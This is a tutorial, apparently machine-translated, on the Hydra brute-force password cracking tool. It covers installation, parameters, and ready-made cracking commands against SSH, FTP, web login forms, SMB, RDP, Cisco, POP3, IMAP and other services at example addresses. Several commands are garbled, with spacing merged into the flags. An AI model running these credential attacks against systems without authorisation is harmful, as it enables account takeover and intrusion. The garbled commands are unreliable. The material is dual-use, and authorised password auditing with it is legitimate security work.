Hydra
Hydra's Violent Password Cracking Tool is quite powerful, supporting online password cracking for almost all protocols. Whether the password can be cracked or not depends on whether the dictionary is strong enough for social engineering penetration to sometimes achieve twice the result with half the effort.This article only discusses testing from a security perspective.
1. Introduction
Hydra is an open source and violent password cracking tool for the well-known hacker organization thc, which can crack many passwords online.Official website: http://www.thc.org/thc-hydra, supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-HEAD HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
2. Installation
Hydra Installation
# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
# tar zxvf hydra-7.4.1.tar.gz
# cd hydra-7.4.1
# ./configure
# make && make install
3. Explanation of parameters
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R Continue with the last progress followed by cracking.
-S UseSSLLink.
-s PORT This parameter allows you to specify a non-default port.
-l LOGIN Specify cracked users to crack specific users.
-L FILE Specify a user name dictionary.
-p PASS Lower case, specify password cracking, use less, generally use a password dictionary.
-P FILE Uppercase, specify the password dictionary.
-e ns Optional options,n: Empty password heuristics,s: Use specified user and password heuristics.
-C FILE Use a colon-separated format, such as "Login name":Password instead-L/-PParameters.
-M FILE Specify the target list file one line at a time.
-o FILE Specify the result output file.
-f in use-MAfter parameters, abort cracking when the first pair of logins or passwords is found.
-t TASKS Number of threads running simultaneously, defaulting to16.
-w TIME Set the maximum time-out, in seconds, by default30s.
-v / -V Show detailed procedures.
server targetip
service Specify the service name, supported services and protocols:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afpWait.
OPT Optional
4. Examples of various uses
Simple demo:The crack succeeds and the result is displayed directly. The red line shown above is the password that was cracked, or it can be output to the file by parameter -o.If the dictionary is strong enough, combined with social workers, the password won't come out long enough.
1. Crack ssh:
Hydra-l username-p password dictionary-t thread-vV-e ns IP SSH
Hydra-l username-p password dictionary-t thread-o save.log-vV IP SSH
2. Crack ftp:
Hydra IP ftp-l username-P password dictionary-t thread (default 16) -vV
Hydra IP ftp-l user name-P password dictionary-e ns-vV
3. get submission to crack web login:
Hydra-l username-p password dictionary-t thread-vV-e ns IP http-get/admin/
Hydra-l username-p password dictionary-t thread-vV-e-ns-f IP http-get/admin/index.php
4. post submission to crack web login:
Hydra-l User Name-P Password Dictionary-s 80 IP http-post-form'/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password'
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(Parameter description: -t Number of threads at the same time 3, -l username is admin, dictionary pass.txt, saved as out.txt, -f stops when a password is cracked, 10.36.16.18 Target ip, http-post-form means that the cracking is a form password cracking submitted by posting with http, <title>is a return message prompt indicating an incorrect guess.)
5,Cracking https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6,Cracking teamspeak:
hydra -l User name -P Password Dictionary -s Port number -vV ip teamspeak
7,Cracking cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8,Cracking smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9,Cracking pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10,Cracking rdp:
hydra ip rdp -l administrator -P pass.txt -V
11,Cracking http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12,Cracking imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN